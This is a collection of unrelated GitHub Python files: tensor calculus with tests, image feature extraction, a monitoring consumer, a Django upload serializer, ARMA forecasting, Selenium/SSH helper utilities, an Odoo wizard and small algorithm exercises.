diff = lambda x: sympy.diff(x, symb)\n try:\n res = list(map(diff, elt))\n except TypeError:\n res = diff(elt)\n return res\n for i in range(3):\n gradF[i] = [_diff(elt, varList[i]) for elt in gradF[i].tolist()]\n return Tensor(NP.transpose(NP.array(gradF)))\n\ndef div(F):\n if not isTensor(F):\n raise ValueError('Argument must be a 
Tensor')\n varList = [X, Y, Z]#F.sympyVariables()\n if F.rank == 0:\n raise ValueError('Divergence just applies on Tensor with rank>0')\n elif F.rank == 1:\n return Tensor(sympy.diff(F[0], varList[0]) + sympy.diff(F[1], varList[1]) + sympy.diff(F[2], varList[2]))\n elif F.rank == 2:\n return Tensor([sympy.diff(F[0][0], varList[0]) + sympy.diff(F[0][1], varList[1]) + sympy.diff(F[0][2], varList[2]),\n sympy.diff(F[1][0], varList[0]) + sympy.diff(F[1][1], varList[1]) + sympy.diff(F[1][2], varList[2]),\n sympy.diff(F[2][0], varList[0]) + sympy.diff(F[2][1], varList[1]) + sympy.diff(F[2][2], varList[2])])\n elif F.rank == 3:\n return Tensor([[sympy.diff(F[0][0][0], varList[0]) + sympy.diff(F[0][0][1], varList[1]) + sympy.diff(F[0][0][2], varList[2]),\n sympy.diff(F[0][1][0], varList[0]) + sympy.diff(F[0][1][1], varList[1]) + sympy.diff(F[0][1][2], varList[2]),\n sympy.diff(F[0][2][0], varList[0]) + sympy.diff(F[0][2][1], varList[1]) + sympy.diff(F[0][2][2], varList[2])],\n [sympy.diff(F[1][0][0], varList[0]) + sympy.diff(F[1][0][1], varList[1]) + sympy.diff(F[1][0][2], varList[2]),\n sympy.diff(F[1][1][0], varList[0]) + sympy.diff(F[1][1][1], varList[1]) + sympy.diff(F[1][1][2], varList[2]),\n sympy.diff(F[1][2][0], varList[0]) + sympy.diff(F[1][2][1], varList[1]) + sympy.diff(F[1][2][2], varList[2])],\n [sympy.diff(F[2][0][0], varList[0]) + sympy.diff(F[2][0][1], varList[1]) + sympy.diff(F[2][0][2], varList[2]),\n sympy.diff(F[2][1][0], varList[0]) + sympy.diff(F[2][1][1], varList[1]) + sympy.diff(F[2][1][2], varList[2]),\n sympy.diff(F[2][2][0], varList[0]) + sympy.diff(F[2][2][1], varList[1]) + sympy.diff(F[2][2][2], varList[2])]]\n )\n else:\n raise ValueError('Not implemented for Tensor of rank > 3')\n\ndef laplacien(F):\n if not isTensor(F):\n raise ValueError('Argument must be a Tensor')\n LapF = div(grad(F))\n return LapF\n\ndef gradsym(F):\n if not isTensor(F):\n raise ValueError('Argument must be a Tensor')\n gradsymF = 0.5 * (grad(F) + grad(F).transpose())\n return gradsymF\n\n\n#\nclass TensorUnitTest(unittest.TestCase):\n\n def setUp(self):\n if not HAVE_SYMPY:\n return\n self.U = Tensor(NP.array(([X**3, sympy.sin(X), sympy.exp(X)],\n [Y**3, sympy.sin(Y), sympy.exp(Y)],\n [Z**3, sympy.sin(Z), sympy.exp(Z)])))\n\n def testType(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(isTensor(self.U), 1)\n\n def testRank(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(self.U.rank, 2)\n self.assertEqual(grad(self.U).rank, 3)\n\n def testGrad(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(grad(self.U), Tensor(NP.array([[[3*X**2, 0, 0 ], [0, 3*Y**2, 0 ], [0, 0, 3*Z**2 ]], [[sympy.cos(X), 0, 0 ], [0, sympy.cos(Y), 0 ], [0, 0, sympy.cos(Z) ]], [[sympy.exp(X), 0, 0 ], [0, sympy.exp(Y), 0 ], [0, 0, sympy.exp(Z) ]]])))\n\n def testGradSym(self):\n if not HAVE_SYMPY:\n return\n # attention: sensible 3.0*X**2 != 3*X**2\n self.assertEqual(gradsym(self.U), Tensor(NP.array(\n [[[3.0*X**2, 0.5*sympy.cos(X), 0.5*sympy.exp(X)], [0, 1.5*Y**2, 0], [0, 0, 1.5*Z**2]],\n [[0.5*sympy.cos(X), 0, 0], [1.5*Y**2, 1.*sympy.cos(Y), 0.5*sympy.exp(Y)], [0, 0, 0.5*sympy.cos(Z)]],\n [[0.5*sympy.exp(X), 0, 0], [0, 0.5*sympy.exp(Y), 0], [1.5*Z**2, 0.5*sympy.cos(Z), 1.*sympy.exp(Z)]]])))\n\n def testLaplacien(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(laplacien(self.U), Tensor(NP.array([[6*X, 6*Y, 6*Z ], [-sympy.sin(X), -sympy.sin(Y), -sympy.sin(Z) ], [sympy.exp(X), sympy.exp(Y), sympy.exp(Z) ]]) ))\n\n def testDivergence(self):\n if not HAVE_SYMPY:\n return\n 
self.assertEqual(div(grad(self.U)),\n Tensor(NP.array([[6*X, 6*Y, 6*Z ], [-sympy.sin(X), -sympy.sin(Y), -sympy.sin(Z) ], [sympy.exp(X), sympy.exp(Y), sympy.exp(Z) ]]) ))\n\n def testProduitDoubleContracte(self):\n if not HAVE_SYMPY:\n return\n TensO4Sym = Tensor(NP.array([[[[ 400., 0., 0., ],\n [ 0., 200., 0., ],\n [ 0., 0., 200., ]],\n [[ 0., 66.66666667, 0., ],\n [ 66.66666667, 0., 0., ],\n [ 0., 0., 0., ]],\n [[ 0., 0., 133.33333333],\n [ 0., 0., 0., ],\n [ 133.33333333, 0., 0., ]]],\n [[[ 0., 66.66666667, 0., ],\n [ 66.66666667, 0., 0., ],\n [ 0., 0., 0., ]],\n [[ 200., 0., 0., ],\n [ 0., 233.33333333, 0., ],\n [ 0., 0., 166.66666667]],\n [[ 0., 0., 0., ],\n [ 0., 0., 66.66666667],\n [ 0., 66.66666667, 0., ]]],\n [[[ 0., 0., 133.33333333],\n [ 0., 0., 0., ],\n [ 133.33333333, 0., 0., ]],\n [[ 0., 0., 0., ],\n [ 0., 0., 66.66666667],\n [ 0., 66.66666667, 0., ]],\n [[ 200., 0., 0., ],\n [ 0., 166.66666667, 0., ],\n [ 0., 0., 233.33333333]]]]) )\n\n self.assertEqual(TensO4Sym.produitDoubleContracte(self.U),\n Tensor(NP.array([[200.000000000000*sympy.sin(Y) + 400.000000000000*X**3 + 200.000000000000*sympy.exp(Z), 66.6666666700000*sympy.sin(X) + 66.6666666700000*Y**3, 133.333333330000*Z**3 + 133.333333330000*sympy.exp(X) ],\n [66.6666666700000*sympy.sin(X) + 66.6666666700000*Y**3, 233.333333330000*sympy.sin(Y) + 200.000000000000*X**3 + 166.666666670000*sympy.exp(Z), 66.6666666700000*sympy.sin(Z) + 66.6666666700000*sympy.exp(Y) ],\n [133.333333330000*Z**3 + 133.333333330000*sympy.exp(X), 66.6666666700000*sympy.sin(Z) + 66.6666666700000*sympy.exp(Y), 166.666666670000*sympy.sin(Y) + 200.000000000000*X**3 + 233.333333330000*sympy.exp(Z) ]])))\n\n def testproduitSimpleContracte(self):\n if not HAVE_SYMPY:\n return\n self.assertEqual(self.U.produitSimpleContracte(Tensor(NP.array([-1, 0, 0]))), Tensor(NP.array([-X**3, -Y**3, -Z**3])))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ehmoussi/code_aster","sub_path":"code_aster/MacroCommands/Contrib/TensorModule.py","file_name":"TensorModule.py","file_ext":"py","file_size_in_byte":16421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
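The hand-expanded 3x3 determinant and adjugate inside determinant() and inverse() above can be cross-checked against numpy.linalg. This standalone snippet (independent of the Tensor class) verifies both formulas on a sample matrix:

import numpy as np

M = np.array([[2., 1., 0.], [0., 3., 1.], [1., 0., 2.]])
a, b, c = M[0]
d, e, f = M[1]
g, h, i = M[2]
# cofactor expansion along the first row, exactly as in determinant()
det = a*(e*i - f*h) - b*(d*i - f*g) + c*(d*h - e*g)
assert np.isclose(det, np.linalg.det(M))
# Mprime in inverse() is the adjugate; adj/det must equal the inverse
adj = np.array([[e*i - f*h, c*h - b*i, b*f - c*e],
                [f*g - d*i, a*i - c*g, c*d - a*f],
                [d*h - e*g, b*g - a*h, a*e - b*d]])
assert np.allclose(adj / det, np.linalg.inv(M))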
+{"seq_id":"21103272365","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\nDescription: \nAuthor: yangyuxiang\nDate: 2021-03-19 00:03:13\nLastEditors: yangyuxiang\nLastEditTime: 2021-04-17 22:53:31\nFilePath: /Assignment2-3/data/transform_images.py\n'''\n\nimport os\nfrom os.path import dirname\nimport sys\nimport torch\nfrom torch import device\nimport torch.nn as nn\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom torchvision import models, transforms\n\nsys.path.append('..')\nimport config\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.resnet = models.resnet101(pretrained=False)\n self.resnet.load_state_dict(torch.load(\"./resnet101-5d3b4d8f.pth\"))\n self.w = nn.Linear(2048, config.img_vec_dim)\n\n def forward(self, x):\n output = self.resnet.conv1(x)\n output = self.resnet.bn1(output)\n output = self.resnet.relu(output)\n output = self.resnet.maxpool(output)\n output = self.resnet.layer1(output)\n output = self.resnet.layer2(output)\n output = self.resnet.layer3(output)\n output = self.resnet.layer4(output)\n output = self.resnet.avgpool(output)\n output = self.w(output.permute(0, 3, 2, 1))\n output = torch.tanh(output)\n return output\n\n\ndef extract_vectors(img_path, net, device):\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.repeat(1,1,1)),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n \n img = Image.open(img_path)\n img = img.convert(\"RGB\")\n img = transform(img)\n# print(img.shape)\n \n img = img.unsqueeze(0).float()\n img = img.to(device)\n# print(img)\n output = net(img)\n return output\n\n\nif __name__ == \"__main__\":\n device = torch.device(\"cuda\" if config.is_cuda else \"cpu\")\n model = Net()\n model.to(device)\n image_data = []\n for path, dirnames, filenames in os.walk(config.data_folder):\n for filename in filenames:\n if filename.endswith(\"jpg\"):\n image_data.append(os.path.join(path, filename))\n\n print(\"has %s images.\" % len(image_data))\n with open(config.img_vecs, mode=\"w\", encoding='utf-8') as f:\n for img_path in tqdm(image_data):\n# print(img_path)\n output = extract_vectors(img_path, model, device)\n output = output.cpu()\n output = output.reshape(-1)\n output = output.data.numpy()\n# print(output.shape)\n img_name = img_path.split(\"/\")[-1]\n f.write(img_name + '\\t')\n f.write(\" \".join([str(v) for v in output.tolist()]))\n f.write(\"\\n\")\n \n \n \n\n\n\n\n ","repo_name":"yangyuxiang1996/Chinese-Text-Generation","sub_path":"data/transform_images.py","file_name":"transform_images.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12846317304","text":"import datetime\nimport logging\n\nimport monitoring.entrypoint as redis_stream\nfrom monitoring.exceptions.monitoring import UnrecognizedMonitorName\nfrom monitoring.service.base import ServiceMixin\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass MainServiceMixin(ServiceMixin):\n @redis_stream.consume(\"cg-monitoring-service\", [\"MONITORING_STREAM\"])\n def consume_monitoring_stream(self, message_id, message):\n\n monitor_name = message[\"__MONITOR_NAME\"]\n\n logger.info(\n f\"{datetime.datetime.utcnow().isoformat()}: consuming {monitor_name} with id {message_id}\"\n )\n\n if monitor_name == \"API_REQUEST\":\n self.storage.api_requests.append(\n message_id,\n message.get(\"url\"),\n message.get(\"method\"),\n message.get(\"duration\"),\n message.get(\"status\"),\n message.get(\"status_code\"),\n message.get(\"remote_addr\"),\n )\n else:\n raise UnrecognizedMonitorName(f\"{monitor_name} is not recognized\")\n","repo_name":"findfeatures/monitoring-service","sub_path":"monitoring/service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22376992677","text":"from django.core.files.storage import default_storage\nfrom rest_framework import serializers\nfrom diagnosis_code.models import DiagnosisCode\nfrom .tasks import process_csv_file\n\n\nclass DiagnosisCodeSerializer(serializers.ModelSerializer):\n class Meta:\n model = DiagnosisCode\n fields = '__all__'\n\n\nclass FileUploadSerializer(serializers.Serializer):\n file = serializers.FileField(required=True, allow_null=False, allow_empty_file=False,)\n user_email = serializers.EmailField(required=False, allow_null=True, allow_blank=True)\n\n def create(self, validated_data):\n file = validated_data['file']\n file_name = default_storage.save(file.name, file)\n if not file_name or str(file_name.split(\".\")[-1]).lower() != \"csv\":\n raise serializers.ValidationError(\"Sorry we support only csv files\")\n process_csv_file.delay(file_name=file_name,\n user_email=validated_data.get('user_email', None))\n return True\n\n def update(self, instance, validated_data):\n raise NotImplementedError('Not required')\n","repo_name":"nshaibu/Test","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23349451892","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 28 15:01:59 2022\n\n@author: quindaly\n\"\"\"\nfrom scipy.stats.distributions import norm\nfrom scipy.optimize import fmin\nfrom scipy.optimize import minimize\nfrom scipy import linalg as la\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima_model import ARMA\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom pydataset import data as pydata\nfrom statsmodels.tsa.stattools import arma_order_select_ic as order_select\nfrom statsmodels.tsa.base.datetools import dates_from_str\nimport pandas as pd\nimport statsmodels.api as sm\nfrom statsmodels.tsa.api import VARMAX\n\n\n#### Make an ARMA model from scratch using the next 4 functions ####\n\ndef arma_forecast_naive(file='weather.npy',p=2,q=1,n=20):\n \"\"\"\n Perform ARMA(1,1) on data. Let error terms be drawn from\n a standard normal and let all constants be 1.\n Predict n values and plot original data with predictions.\n\n Parameters:\n file (str): data file\n p (int): order of autoregressive model\n q (int): order of moving average model\n n (int): number of future predictions\n \"\"\"\n # Initialize\n data = np.load(file)\n z = list(np.diff(data))\n phi = 0.5\n theta = 0.1\n eps = [np.random.normal(0,1) for _ in range(q)]\n N = len(z) - 1\n \n # ARMA\n for t in range(n):\n ep = np.random.normal(0,1)\n arma = eps[t]\n eps.append(ep) \n \n for i in range(p):\n arma += phi * z[N+t-i]\n \n for i in range(q):\n arma += theta * eps[t-i]\n \n z.append(arma)\n \n \n # Plot the differences with predicted data\n plt.plot(np.linspace(0,N+1,N+1), z[:N+1])\n plt.plot(np.linspace(N+1,len(z),n),z[N+1:])\n plt.title('ARMA Naive Forecast')\n plt.show()\n\ndef arma_likelihood(file='weather.npy', phis=np.array([0.9]), thetas=np.array([0]), mu=17., std=0.4):\n \"\"\"\n Transfer the ARMA model into state space. 
\n Return the log-likelihood of the ARMA model.\n\n Parameters:\n file (str): data file\n phis (ndarray): coefficients of autoregressive model\n thetas (ndarray): coefficients of moving average model\n mu (float): mean of errorm\n std (float): standard deviation of error\n\n Return:\n log_likelihood (float)\n \"\"\"\n # Initialize\n data = np.load(file)\n z = np.diff(data)\n n = len(z)\n \n # Get the parameters from given methods below\n F,Q,H = state_space_rep(phis, thetas, mu, std)[:3]\n mus, covs = kalman(F,Q,H,z - mu)\n draws = []\n \n # Compute all of the draws from the normal\n for i in range(n): \n draw = norm.pdf(x=z[i], loc=H@mus[i] + mu, scale=np.sqrt(H@covs[i]@H.T))\n draws.append(draw)\n \n # Return log of the product of all draws\n return np.sum(np.log(draws))\n\n\n\ndef model_identification(file='weather.npy',p=1,q=1):\n \"\"\"\n Identify parameters to minimize AIC of ARMA(p,q) model\n\n Parameters:\n file (str): data file\n p (int): maximum order of autoregressive model\n q (int): maximum order of moving average model\n\n Returns:\n phis (ndarray (p,)): coefficients for AR(p)\n thetas (ndarray (q,)): coefficients for MA(q)\n mu (float): mean of error\n std (float): std of error\n \"\"\"\n def f(x):\n return -1*arma_likelihood(file, phis=x[:p], thetas=x[p:p+q], mu=x[-2], std=x[-1])\n \n # Initialize\n time_series = np.load(file)\n \n # Find parameters\n x0 = np.zeros(p+q+2)\n x0[-2] = time_series.mean()\n x0[-1] = time_series.std()\n sol = minimize(f,x0,method=\"SLSQP\")\n sol = sol['x']\n \n phi = sol[:p]\n theta = sol[p:p+q]\n mu = sol[-2]\n std = sol[-1]\n\n return (np.array(phi), np.array(theta), mu, std)\n\ndef arma_forecast(file='weather.npy', phis=np.array([0]), thetas=np.array([0]), mu=0., std=0., n=30):\n \"\"\"\n Forecast future observations of data.\n \n Parameters:\n file (str): data file\n phis (ndarray (p,)): coefficients of AR(p)\n thetas (ndarray (q,)): coefficients of MA(q)\n mu (float): mean of ARMA model\n std (float): standard deviation of ARMA model\n n (int): number of forecast observations\n\n Returns:\n new_mus (ndarray (n,)): future means\n new_covs (ndarray (n,)): future standard deviations\n \"\"\"\n data = np.load(file)\n z = np.diff(data)\n n = len(z)\n N = len(z) - 1\n F,Q,H = state_space_rep(phis, thetas, mu, std)[:3]\n mus, covs = kalman(F,Q,H,z-mu)\n \n X0 = mus[-1]\n P0 = covs[-1]\n \n # Perform the update once\n y = z[-1] - H@X0\n S = H@P0@H.T\n K = P0@H.T@la.inv(S)\n X0 = X0 + K@y\n P0 = (np.eye(len(K@H)) - K@H) @ P0\n \n new_mus = [F@X0]\n new_covs = [F@P0@F.T + Q]\n \n for i in range(1,n):\n new_mus.append(F@new_mus[i-1])\n new_covs.append(F@new_covs[i-1]@F.T + Q)\n \n obs = []\n for i in range(len(new_mus)):\n obs.append(H@new_mus[i] + mu)\n \n # Plot the differences with predicted data\n std = np.einsum(\"so,noO,SO->nsS\",H,covs,H).ravel()[-1]\n plt.plot(np.linspace(0,N+1,N+1), z[:N+1], label='Old Data')\n plt.plot(np.linspace(N+2,N+len(obs)+1,len(obs)),obs, '--', label='Forecast')\n plt.plot(np.linspace(N+2,N+len(obs)+1,len(obs)),obs + std, '--', c='green', label='$95%$ CI')\n plt.plot(np.linspace(N+2,N+len(obs)+1,len(obs)),obs - std, '--', c='green', label='$95%$ CI')\n plt.legend(['Old Data', 'Forecast', '$95\\%$ Confidence Interval'])\n plt.title('ARMA Forecast')\n plt.xlabel('Days')\n plt.ylabel('Change in Temperature $(C) - \\mu = 0$')\n plt.show()\n \n return (np.array(new_mus), np.array(new_mus))\n \n\n#### Implement ARMA using the statsmodels package ####\n\ndef sm_arma(file ='weather.npy', p=4, q=4, n=30):\n \"\"\"\n Build an 
ARMA model with statsmodel and \n predict future n values.\n\n Parameters:\n file (str): data file\n p (int): maximum order of autoregressive model\n q (int): maximum order of moving average model\n n (int): number of values to predict\n\n Return:\n aic (float): aic of optimal model\n \"\"\"\n data = np.load(file)\n z = np.diff(data)\n N = len(z) - 1\n \n best_aic = np.inf\n \n # Find best model that minimizes AIC\n for i in range(1,p+1):\n for j in range(1,q+1):\n model = ARIMA(z, order=(i,0,j), trend='c').fit(method='innovations_mle')\n \n if model.aic < best_aic:\n best_aic = model.aic\n best_model = model\n\n \n new_vals = best_model.predict(start=0, end=len(data)+n)\n \n # Plot\n plt.plot(np.linspace(0,N+1,N+1), z[:N+1], label='Old Data')\n plt.plot(np.linspace(0,len(new_vals),len(new_vals)), new_vals, label='ARIMA Model')\n plt.title('Statsmodel ARIMA Forecast')\n plt.xlabel('Days')\n plt.ylabel('Change in Temperature $(C) - \\mu = 0$')\n plt.legend()\n plt.show()\n \n return best_aic\n \n \ndef sm_varma(start = '1959-09-30', end = '2012-09-30'):\n \"\"\"\n Build an ARMA model with statsmodel and\n predict future n values.\n\n Parameters:\n start (str): the data at which to begin forecasting\n end (str): the date at which to stop forecasting\n\n Return:\n aic (float): aic of optimal model\n \"\"\"\n # Load in data\n df = sm.datasets.macrodata.load_pandas().data\n # Create DateTimeIndex\n dates = df[['year', 'quarter']].astype(int).astype(str)\n dates = dates[\"year\"] + \"Q\" + dates[\"quarter\"]\n dates = dates_from_str(dates)\n df.index = pd.DatetimeIndex(dates)\n # Select columns used in prediction\n df = df[['realgdp','realcons','realinv']]\n \n model = VARMAX(df[['realgdp', 'realcons', 'realinv']])\n model = model.fit(maxiter=1000, disp=False, ic='aic')\n predict = model.predict(start, end)\n \n # Get CI\n forecast_obj = model.get_forecast(end)\n all_CI = forecast_obj.conf_int(alpha=0.05)\n \n # Plot\n fig, ax = plt.subplots(3,1, figsize=(10,9))\n # Plot realgdp\n ax[0].plot(df['realgdp'])\n ax[0].plot(predict['realgdp'])\n ax[0].plot(all_CI['upper realgdp'], '--', c='green')\n ax[0].plot(all_CI['lower realgdp'], '--', c='green')\n ax[0].legend(['realgdp', 'Forecast', '$95\\%$ Confidence Interval'])\n\n # Plot realcons\n ax[1].plot(df['realcons'])\n ax[1].plot(predict['realcons'])\n ax[1].plot(all_CI['upper realcons'], '--', c='green')\n ax[1].plot(all_CI['lower realcons'], '--', c='green')\n ax[1].legend(['realcons', 'Forecast', '$95\\%$ Confidence Interval'])\n\n \n # Plot realinv\n ax[2].plot(df['realinv'])\n ax[2].plot(predict['realinv'])\n ax[2].plot(all_CI['upper realinv'], '--', c='green')\n ax[2].plot(all_CI['lower realinv'], '--', c='green')\n ax[2].legend(['realinv', 'Forecast', '$95\\%$ Confidence Interval'])\n\n \n \n plt.show()\n \n return model.aic\n \n############################### Helper Functions ###############################\n \ndef kalman(F, Q, H, time_series):\n # Get dimensions\n dim_states = F.shape[0]\n\n # Initialize variables\n # covs[i] = P_{i | i-1}\n covs = np.zeros((len(time_series), dim_states, dim_states))\n mus = np.zeros((len(time_series), dim_states))\n\n # Solve of for first mu and cov\n covs[0] = np.linalg.solve(np.eye(dim_states**2) - np.kron(F,F),np.eye(dim_states**2)).dot(Q.flatten()).reshape(\n (dim_states,dim_states))\n mus[0] = np.zeros((dim_states,))\n\n # Update Kalman Filter\n for i in range(1, len(time_series)):\n t1 = np.linalg.solve(H.dot(covs[i-1]).dot(H.T),np.eye(H.shape[0]))\n t2 = 
covs[i-1].dot(H.T.dot(t1.dot(H.dot(covs[i-1]))))\n covs[i] = F.dot((covs[i-1] - t2).dot(F.T)) + Q\n mus[i] = F.dot(mus[i-1]) + F.dot(covs[i-1].dot(H.T.dot(t1))).dot(\n time_series[i-1] - H.dot(mus[i-1]))\n return mus, covs\n\ndef state_space_rep(phis, thetas, mu, sigma):\n # Initialize variables\n dim_states = max(len(phis), len(thetas)+1)\n dim_time_series = 1 #hardcoded for 1d time_series\n\n F = np.zeros((dim_states,dim_states))\n Q = np.zeros((dim_states, dim_states))\n H = np.zeros((dim_time_series, dim_states))\n\n # Create F\n F[0][:len(phis)] = phis\n F[1:,:-1] = np.eye(dim_states - 1)\n # Create Q\n Q[0][0] = sigma**2\n # Create H\n H[0][0] = 1.\n H[0][1:len(thetas)+1] = thetas\n\n return F, Q, H, dim_states, dim_time_series\n\n\n\n","repo_name":"quindaly/ARMA","sub_path":"arma_model.py","file_name":"arma_model.py","file_ext":"py","file_size_in_byte":10470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
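Every function above expects weather.npy; for experimenting without that file, a synthetic ARMA(1,1) series with the same phi=0.5, theta=0.1 used in arma_forecast_naive can be generated directly:

import numpy as np

rng = np.random.default_rng(0)
phi, theta = 0.5, 0.1
eps = rng.standard_normal(200)          # standard-normal shocks
z = np.zeros(200)
for t in range(1, 200):
    # z_t = phi * z_{t-1} + eps_t + theta * eps_{t-1}
    z[t] = phi * z[t-1] + eps[t] + theta * eps[t-1]
print(z[:5])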
+{"seq_id":"5874369984","text":"\"\"\"\n根据tool 封装常用方法\n\"\"\"\nimport pymysql, pyperclip, os, paramiko\nimport pyzbar.pyzbar as pyzbar\nfrom PIL import Image\n\n\n\nclass SumOperate:\n \"\"\" 其他 常用 非 selenium 类方法 \"\"\"\n \n @staticmethod\n def get_2fa(code : str):\n \"\"\" 执行2fa 获取 验证码\"\"\"\n result = os.popen(f'kmg 2fa {code}').read()\n return result\n\n @staticmethod\n def mysql_opreate(ip:str=\"139.224.239.215\", user:str=\"root\", pw:str=None, dbname:str=None, sql:str=None):\n db = pymysql.connect(host=ip, user=user, password=pw, database=dbname)\n\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n db.close()\n return data\n\n \n\n @staticmethod\n def get_img_info(path:str):\n \"\"\"\n 识别二维码\n \"\"\"\n img = Image.open(path)\n img.show()\n barcodes = pyzbar.decode(img)\n for x in barcodes:\n return x.data.decode(\"utf-8\")\n\n @staticmethod\n def get_clip_text():\n print(pyperclip.paste())\n return pyperclip.paste()\n\n @staticmethod\n def ssh_server(ip, port, username, pw ,cmd):\n \"\"\"远程连接 服务器, 执行相关命令 \"\"\"\n # 生成SSH客户端\n s = paramiko.SSHClient()\n s.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n s.connect(ip, port, username, password=pw)\n stdin,stdout,stderr = s.exec_command(cmd)\n p = stdout.read()\n s.close()\n return p\n \n \n\n @staticmethod\n def logmsg(msg: str):\n \"\"\"\n 对rais msg 进行处理后存入log 中\n \"\"\"\n txt = msg.split(r'> File', 1)\n return txt[-1]\n\n\n","repo_name":"boziyoung/selenium","sub_path":"common/operate.py","file_name":"operate.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40411610859","text":"from odoo import fields, models\n\n\nclass StockBackorderConfirmation(models.TransientModel):\n _inherit = \"stock.backorder.confirmation\"\n\n def compute_carrier_id(self):\n records=self.env['stock.picking'].browse(self.env.context.get('active_ids'))\n for i in records:\n if i.carrier_id:\n return i.carrier_id.id\n\n return False\n\n carrier_id = fields.Many2one('delivery.carrier', 'Carrier', default=compute_carrier_id)\n \n def process(self):\n if self.carrier_id:\n self.pick_ids.write({\"carrier_id\": self.carrier_id.id})\n super().process()\n attachment_ids = self.env['ir.attachment'].search(\n [('res_id', 'in', self.pick_ids.ids), ('res_model', '=', 'stock.picking')])\n\n return attachment_ids.action_download_attachment()","repo_name":"Leozzin/addons_alfa","sub_path":"de_alfa_get_carrier_wizard/wizard/stock_backorder_confirmation.py","file_name":"stock_backorder_confirmation.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36076767250","text":"from collections import deque\n\nn = int(input())\nindegree = [0] * (n+1)\ngraph = [[] for _ in range(n+1)]\ncost = [0] * (n+1)\n\n\n# 소요시간, \nfor j in range(1, n+1):\n inp = list(map(int, input().split()))\n for i in range(len(inp)): \n if i == 0: # j과목의 소요시간\n cost[j] = inp[i]\n elif inp[i] != -1: # j과목의 선수과목\n prior = inp[i]\n graph[prior].append(j)\n indegree[j] += 1\n# 동시에 여러 강의 수강 가능 \n# n까지의 최소시간 어떻게 계산?\n# 같은 length로 들어간 큐에서, 최소시간만 고려한다.\n\n# 위상 정렬 함수\ndef topology_sort():\n time = [c for c in cost] # 시간 후보 넣는 리스트\n q = deque()\n\n # 첫시작 : 선수과목 (indegree) 가 0인 노드 삽입\n for i in range(1, n+1):\n if indegree[i] == 0:\n q.append(i)\n\n # 큐가 빌때까지 반복\n while q:\n now = q.popleft()\n # result.append(now)\n # 현재 노드 소요시간 갱신\n # cost[now] += max(time[now])\n # 연결 노드 진입차수에서 1 빼기\n for i in graph[now]:\n indegree[i] -= 1\n # 연결 노드의 시간 리스트에 추가\n # time[i].append(cost[now])\n time[i] = max(time[i], cost[i]+time[now])\n # 새롭게 0이 되는 노드를 큐에 삽입\n if indegree[i] == 0:\n q.append(i)\n\n for t in time[1:]:\n print(t)\n\ntopology_sort()\n\n\n\n\n \n\n \n\n","repo_name":"hoeen/coding_test_training","sub_path":"solution_codes/bookcodingtest_그래프_커리큘럼_1회.py","file_name":"bookcodingtest_그래프_커리큘럼_1회.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"ko","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
+{"seq_id":"9935304281","text":"from sys import platform\nimport re\n\n\nclass OutilsControleurs:\n \"\"\"\n Classe regroupant divers methodes servant dans l'ensemble du programme.\n \"\"\"\n\n def test_date(date):\n \"\"\"\n Methode servant à controler le format d'une date.\n type d'arguments : str\n return : 0, 1, 3 si erreur, et 2 si valeur correct\n rtype : int\n \"\"\"\n if len(date) > 10:\n return 0\n if len(date) < 10:\n return 1\n test_date = re.match(r'[0-3][0-9]/[0-1][0-9]/[0-9][0-9][0-9][0-9]', date)\n if test_date:\n return 2\n else:\n return 3\n\n def which_os():\n \"\"\"\n Methode qui test l'os de l'ordinateur puis retourne la bonne syntaxe.\n return : syntaxe correcte pour effacer la console\n rtype : str\n \"\"\"\n if platform == \"linux\" or platform == \"linux2\":\n return '\"cls\"'\n elif platform == \"darwin\":\n return '\"clear\"'\n elif platform == \"win32\":\n return '\"cls\"'\n\n def test_heure(heure):\n \"\"\"\n Methode servant à controler le format d'une heure.\n type d'arguments : str\n return : 0, 1, 3 si erreur, et 2 si valeur correct\n rtype : int\n \"\"\"\n if len(heure) > 5:\n return 0\n if len(heure) < 5:\n return 1\n test_heure = re.match(r'[0-2][0-9]:[0-5][0-9]', heure)\n if test_heure:\n return 2\n else:\n return 3\n","repo_name":"ChevallierQ/P4_01_tournois_echecs_fini","sub_path":"controleurs/outils_controleurs.py","file_name":"outils_controleurs.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
